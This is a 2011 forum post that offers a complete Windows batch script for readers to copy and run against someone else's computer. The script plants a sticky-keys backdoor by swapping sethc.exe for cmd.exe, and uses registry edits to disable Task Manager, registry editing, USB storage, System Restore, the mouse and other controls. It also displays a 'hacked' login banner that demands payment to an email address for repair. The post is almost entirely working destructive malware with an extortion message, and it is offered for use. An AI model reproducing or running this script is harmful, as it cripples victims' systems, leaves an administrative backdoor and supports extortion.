Skream Example Posted March 24, 2011 Report Posted March 24, 2011 Below is the batch script which edits registry forcefully and make some unwanted changes in windows, which finally makes the person mad n format the system. Copy and Paste the below code to notepad n save as .bat@ECHO OFFREM adding the system prompt at the login time cd\cd windows\system32copy cmd.exe d:d:ren cmd.exe sethc.exeecho y|copy sethc.exe c:\windows\system32\del sethc.exeREM removing folder options from user panelREG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /fREM removing folder options from machnieREG add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /fREM disabling task managerREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fREM disabling the run barREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /fREM disabling the noclose optionREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /fREM disabling the NoFind(search) optionREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /fREM disabling the all drives from user seeingREG add HKCU\software\microsoft\windows\currentversion\policies\explorer /v NoDrives /t REG_DWORD /d 0x3ffffff /fREM disabling the desktopREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /fREM adding the legal caption at the start upREG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /t REG_SZ /d "YOUR COMPUTER IS HACKED BY Crazy009" /fREM adding the text in the legal caption value at start upREG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /t REG_SZ /d "HEY DUDE,HOW ARE YOU ???? HOPEFULLY YOU ARE NOT FINE AS YOUR COMPUTER IS HACKED BY ME.ACTUALLY YOU MUST GIVE RESPECT TO THE HACKERS,THESE GUYS ARE BRILLIANT AND BLAH,BLAH......OH DONT CRY FOR YOUR SYSTEM.I CAN REPAIR IT,FOR THAT PAY ME,CONTACT: indishell.crazy009@gmail.com" /fREM Hacking the Internet ExplorerREM Making the toolbar kewlREG add "HKCU\Software\Microsoft\Internet Explorer\Toolbar" /v BackBitmap /t REG_SZ /d c:\Windows\Web\Wallpaper\Bliss.bmp /fREM Changing the Caption of IEREG add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "HACKED BY ANKIT CHAUHAN" /fREM removing the user name from start menuREG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 1 /fREM removing all-programs option from start menuREG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /fREM locking the taskbarREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v LockTaskbar /t REG_DWORD /d 1 /fREM blocking usb portsREG add HKLM\System\CurrentControlSet\Services\USBSTOR /v Start /t REG_DWORD /d 4 /fREM disabling system restore pointREG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /fREM disabling the windows keyREG add "HKLM\System\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 00000000000000000300000000005be000005ce000000000 /f REM changing the wallpaperREG add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Windows\Web\Wallpaper\Azul.jpeg /fREM disabling the editing of registryREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /fREM editing the boot file with no guibootbootcfg /addsw /ng /id 1REM Swapping of Mouse Button Functionsrundll32 user32.dll,SwapMouseButtonREM TO DISABLE THE MOUSEset key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"reg delete %key%reg add %key% /v Start /t REG_DWORD /d 4Don't run on your own system Quote